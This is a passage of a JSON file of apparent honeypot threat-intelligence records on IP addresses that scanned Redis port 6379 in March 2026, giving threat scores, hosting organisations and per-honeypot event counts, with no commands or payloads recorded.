        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T18:59:28+00:00",
        "last_seen_30d": "2026-03-06T19:01:41.567000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 1
      }
    },
    "130.12.180.150": {
      "attack_count": 30,
      "first_seen": "2026-03-10T08:42:10.000Z",
      "last_seen": "2026-03-10T08:43:18.295Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 202412,
      "as_org": "Omegatech LTD",
      "threat_score": 39.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 30,
        "persistence": 9.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.47
      },
      "reputation_metrics": {
        "total_events_30d": 10464,
        "days_active_30d": 11,
        "ports_targeted_30d": 1771,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-05T15:48:32+00:00",
        "last_seen_30d": "2026-03-15T14:04:18.529000+00:00",
        "days_since_last_seen": 16
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7059,
        "Honeytrap": 3391,
        "Redishoneypot": 7,
        "Adbhoney": 4,
        "Dionaea": 2,
        "CitrixHoneypot": 1
      }
    },
    "159.54.171.233": {
      "attack_count": 27,
      "first_seen": "2026-03-06T09:23:39.000Z",
      "last_seen": "2026-03-12T16:29:02.638Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Jose",
      "asn": 31898,
      "as_org": "Oracle Corporation",
      "threat_score": 10.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.8,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.37
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T09:23:39+00:00",
        "last_seen_30d": "2026-03-12T16:29:02.638000+00:00",
        "days_since_last_seen": 19
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "64.62.156.142": {
      "attack_count": 27,
      "first_seen": "2026-03-02T11:50:15.000Z",
      "last_seen": "2026-03-02T11:51:57.420Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 376,
        "days_active_30d": 30,
        "ports_targeted_30d": 100,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T06:34:32+00:00",
        "last_seen_30d": "2026-03-31T11:41:37.746000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 228,
        "Honeytrap": 105,
        "Redishoneypot": 11,
        "Adbhoney": 10,
        "Miniprint": 8,
        "Mailoney": 6,
        "Tanner": 3,
        "ConPot": 2,
        "Dionaea": 2,
        "CitrixHoneypot": 1
      }
    },
    "220.250.52.75": {
      "attack_count": 26,
      "first_seen": "2026-03-03T08:13:56.000Z",
      "last_seen": "2026-03-25T15:44:42.928Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 33.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 19.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 23,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T08:13:57+00:00",
        "last_seen_30d": "2026-03-25T15:44:42.928000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "65.49.1.232": {
      "attack_count": 26,
      "first_seen": "2026-03-19T11:49:46.000Z",
      "last_seen": "2026-03-19T11:51:32.778Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 94.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 24.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 310,
        "days_active_30d": 30,
        "ports_targeted_30d": 80,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T09:59:13+00:00",
        "last_seen_30d": "2026-03-31T06:58:43.974000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 194,
        "Honeytrap": 95,
        "Redishoneypot": 11,
        "Dionaea": 4,
        "Tanner": 4,
        "Cowrie": 2
      }
    },
    "65.49.20.67": {
      "attack_count": 26,
      "first_seen": "2026-03-08T14:09:17.000Z",
      "last_seen": "2026-03-08T14:10:55.225Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 97.0,
      "threat_level": "critical",
      "score_components": {
        "frequency": 27.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 501,
        "days_active_30d": 30,
        "ports_targeted_30d": 84,
        "honeypots_triggered_30d": 10,
        "first_seen_30d": "2026-03-02T06:01:02.605000+00:00",
        "last_seen_30d": "2026-03-31T14:40:14.637000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 293,
        "Honeytrap": 155,
        "Cowrie": 12,
        "H0neytr4p": 12,
        "Redishoneypot": 11,
        "Mailoney": 6,
        "Dionaea": 5,
        "ConPot": 4,
        "Honeyaml": 2,
        "Miniprint": 1
      }
    },
    "220.181.1.163": {
      "attack_count": 25,
      "first_seen": "2026-03-06T06:30:47.000Z",
      "last_seen": "2026-03-30T18:23:23.507Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 23724,
      "as_org": "IDC, China Telecommunications Corporation",
      "threat_score": 52.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 15.6,
        "persistence": 22.5,
        "diversity": 6,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 36,
        "days_active_30d": 27,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T15:41:47+00:00",
        "last_seen_30d": "2026-03-30T18:23:23.507000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 30,
        "Honeytrap": 6
      }
    },
    "95.215.0.144": {
      "attack_count": 25,
      "first_seen": "2026-03-05T01:22:25.000Z",
      "last_seen": "2026-03-19T12:10:38.432Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 44050,
      "as_org": "Petersburg Internet Network ltd.",
      "threat_score": 97.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 27.6,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 578,
        "days_active_30d": 30,
        "ports_targeted_30d": 31,
        "honeypots_triggered_30d": 11,
        "first_seen_30d": "2026-03-02T06:56:32.148000+00:00",
        "last_seen_30d": "2026-03-31T21:11:45.136000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 443,
        "Honeytrap": 70,
        "Cowrie": 12,
        "Tanner": 12,
        "H0neytr4p": 9,
        "CitrixHoneypot": 8,
        "Honeyaml": 6,
        "Redishoneypot": 6,
        "Dionaea": 5,
        "ElasticPot": 5,
        "Ciscoasa": 2
      }
    },
    "103.221.220.169": {
      "attack_count": 22,
      "first_seen": "2026-03-21T08:12:09.000Z",
      "last_seen": "2026-03-28T04:11:06.246Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Vietnam",
      "country_code": "VN",
      "city": "Ho Chi Minh City",
      "asn": 63760,
      "as_org": "AZDIGI Corporation",
      "threat_score": 23.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-21T08:13:11.210000+00:00",
        "last_seen_30d": "2026-03-28T04:11:06.246000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "125.67.236.54": {
      "attack_count": 22,
      "first_seen": "2026-03-03T23:51:36.000Z",
      "last_seen": "2026-03-09T01:41:17.964Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 5.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T23:52:38.858000+00:00",
        "last_seen_30d": "2026-03-09T01:41:17.964000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "47.112.125.139": {
      "attack_count": 21,
      "first_seen": "2026-03-07T17:58:55.000Z",
      "last_seen": "2026-03-07T18:09:04.664Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shenzhen",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 4.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.4,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T17:58:55+00:00",
        "last_seen_30d": "2026-03-07T18:09:04.664000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 8,
        "Suricata": 3
      }
    },
    "159.65.223.199": {
      "attack_count": 20,
      "first_seen": "2026-03-19T14:27:33.000Z",
      "last_seen": "2026-03-19T14:28:40.745Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 41.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 23.0,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 199,
        "days_active_30d": 2,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-18T22:55:26+00:00",
        "last_seen_30d": "2026-03-19T20:07:33.696000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Suricata": 128,
        "Honeytrap": 55,
        "Redishoneypot": 8,
        "Dionaea": 4,
        "ElasticPot": 4
      }
    },
    "178.128.66.56": {
      "attack_count": 20,
      "first_seen": "2026-03-18T13:50:12.000Z",
      "last_seen": "2026-03-18T13:51:18.321Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 60.1,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 10.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 108512,
        "days_active_30d": 13,
        "ports_targeted_30d": 62636,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-10T17:48:36+00:00",
        "last_seen_30d": "2026-03-22T02:07:44.115000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 97492,
        "Honeytrap": 10961,
        "Dionaea": 12,
        "ConPot": 9,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Adbhoney": 4,
        "Redishoneypot": 3,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "178.128.109.149": {
      "attack_count": 19,
      "first_seen": "2026-03-12T11:54:58.000Z",
      "last_seen": "2026-03-13T06:12:04.711Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Singapore",
      "country_code": "SG",
      "city": "Singapore",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 18.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 14.9,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 31,
        "days_active_30d": 3,
        "ports_targeted_30d": 27,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T11:02:30.622000+00:00",
        "last_seen_30d": "2026-03-14T13:17:13.599000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 31
      }
    },
    "20.75.44.108": {
      "attack_count": 19,
      "first_seen": "2026-03-06T08:25:03.000Z",
      "last_seen": "2026-03-13T15:22:44.660Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boydton",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 11.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.4
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T08:25:03+00:00",
        "last_seen_30d": "2026-03-13T15:22:44.660000+00:00",
        "days_since_last_seen": 18
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "47.117.110.149": {
      "attack_count": 19,
      "first_seen": "2026-03-12T20:38:12.000Z",
      "last_seen": "2026-03-23T02:39:01.014Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 21.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 10.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 12,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-12T20:38:12+00:00",
        "last_seen_30d": "2026-03-23T02:39:01.014000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "66.240.236.116": {
      "attack_count": 19,
      "first_seen": "2026-03-25T06:28:46.000Z",
      "last_seen": "2026-03-25T06:29:52.258Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 87.6,
      "threat_level": "critical",
      "score_components": {
        "frequency": 21.5,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 141,
        "days_active_30d": 29,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T15:48:02.510000+00:00",
        "last_seen_30d": "2026-03-30T00:47:55.203000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 99,
        "Dionaea": 14,
        "Cowrie": 12,
        "Honeytrap": 7,
        "Redishoneypot": 6,
        "ElasticPot": 2,
        "Tanner": 1
      }
    },
    "20.54.218.236": {
      "attack_count": 18,
      "first_seen": "2026-03-14T08:35:30.000Z",
      "last_seen": "2026-03-21T03:52:58.222Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 18.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 6.7,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 8,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-14T08:35:30+00:00",
        "last_seen_30d": "2026-03-21T03:52:58.222000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "43.131.42.117": {
      "attack_count": 18,
      "first_seen": "2026-03-05T11:03:49.000Z",
      "last_seen": "2026-03-07T05:38:36.309Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Frankfurt am Main",
      "asn": 132203,
      "as_org": "Tencent Building, Kejizhongyi Avenue",
      "threat_score": 4.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.0,
        "persistence": 2.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 3,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T11:03:50+00:00",
        "last_seen_30d": "2026-03-07T05:38:36.309000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "52.185.212.58": {
      "attack_count": 18,
      "first_seen": "2026-03-13T03:05:13.000Z",
      "last_seen": "2026-03-27T15:04:47.793Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 29.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 12.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 15,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-13T03:05:13+00:00",
        "last_seen_30d": "2026-03-27T15:04:47.793000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "71.6.232.20": {
      "attack_count": 18,
      "first_seen": "2026-03-11T08:58:20.000Z",
      "last_seen": "2026-03-11T09:00:00.373Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 89.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 19.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 83,
        "days_active_30d": 30,
        "ports_targeted_30d": 20,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T12:04:25.980000+00:00",
        "last_seen_30d": "2026-03-31T09:53:50.070000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 62,
        "Redishoneypot": 6,
        "Honeytrap": 5,
        "ConPot": 3,
        "Dionaea": 3,
        "Mailoney": 2,
        "H0neytr4p": 1,
        "Tanner": 1
      }
    },
    "157.245.251.149": {
      "attack_count": 17,
      "first_seen": "2026-03-19T14:27:26.000Z",
      "last_seen": "2026-03-19T14:37:34.258Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 12.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 8.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.6
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-19T14:27:26+00:00",
        "last_seen_30d": "2026-03-19T14:37:34.258000+00:00",
        "days_since_last_seen": 12
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 5,
        "Suricata": 2
      }
    },
    "86.54.31.40": {
      "attack_count": 17,
      "first_seen": "2026-03-14T20:46:50.000Z",
      "last_seen": "2026-03-14T20:47:57.988Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": null,
      "asn": 12989,
      "as_org": "Black HOST Ltd",
      "threat_score": 93.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 235,
        "days_active_30d": 30,
        "ports_targeted_30d": 37,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-02T00:17:14+00:00",
        "last_seen_30d": "2026-03-31T18:46:20.057000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 176,
        "Honeytrap": 47,
        "H0neytr4p": 5,
        "Redishoneypot": 5,
        "ElasticPot": 2
      }
    },
    "112.74.38.239": {
      "attack_count": 16,
      "first_seen": "2026-03-11T19:57:12.000Z",
      "last_seen": "2026-03-11T19:58:45.914Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shenzhen",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 24.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.0,
        "persistence": 10.0,
        "diversity": 14,
        "spread": 20,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 12,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-03T22:57:37.649000+00:00",
        "last_seen_30d": "2026-03-14T02:53:25.263000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Cowrie": 2,
        "Dionaea": 1,
        "Honeytrap": 1
      }
    },
    "172.178.81.49": {
      "attack_count": 16,
      "first_seen": "2026-03-05T14:47:48.000Z",
      "last_seen": "2026-03-05T14:50:36.171Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 62.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 12.3,
        "persistence": 23.3,
        "diversity": 14,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 17,
        "days_active_30d": 28,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T13:10:05.007000+00:00",
        "last_seen_30d": "2026-03-30T18:24:38.107000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 11,
        "Honeytrap": 3,
        "Redishoneypot": 3
      }
    },
    "20.169.107.229": {
      "attack_count": 16,
      "first_seen": "2026-03-20T12:47:30.000Z",
      "last_seen": "2026-03-20T12:50:55.520Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 56.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.6,
        "persistence": 20.0,
        "diversity": 16,
        "spread": 15,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 24,
        "ports_targeted_30d": 8,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T09:11:48+00:00",
        "last_seen_30d": "2026-03-27T14:53:12.050000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15,
        "Honeytrap": 5,
        "Redishoneypot": 3
      }
    },
    "20.169.91.42": {
      "attack_count": 16,
      "first_seen": "2026-03-02T07:26:21.000Z",
      "last_seen": "2026-03-02T07:28:42.789Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 55.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 12.0,
        "persistence": 22.5,
        "diversity": 12,
        "spread": 15,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 16,
        "days_active_30d": 27,
        "ports_targeted_30d": 6,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T07:27:23.244000+00:00",
        "last_seen_30d": "2026-03-28T17:51:06.802000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10,
        "Honeytrap": 3,
        "Redishoneypot": 3
      }
    },
    "45.7.144.44": {
      "attack_count": 16,
      "first_seen": "2026-03-05T14:26:05.000Z",
      "last_seen": "2026-03-10T22:30:18.917Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "Sobradinho",
      "asn": 266605,
      "as_org": "2B Tecnologias em Informatica LTDA",
      "threat_score": 5.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 5.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 6,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T14:27:06.816000+00:00",
        "last_seen_30d": "2026-03-10T22:30:18.917000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "48.217.233.154": {
      "attack_count": 16,
      "first_seen": "2026-03-07T06:09:15.000Z",
      "last_seen": "2026-03-07T06:11:25.101Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 45.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.8,
        "persistence": 17.5,
        "diversity": 10,
        "spread": 15,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 15,
        "days_active_30d": 21,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-06T05:34:30.505000+00:00",
        "last_seen_30d": "2026-03-26T09:00:51.162000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9,
        "Honeytrap": 3,
        "Redishoneypot": 3
      }
    },
    "8.136.230.142": {
      "attack_count": 16,
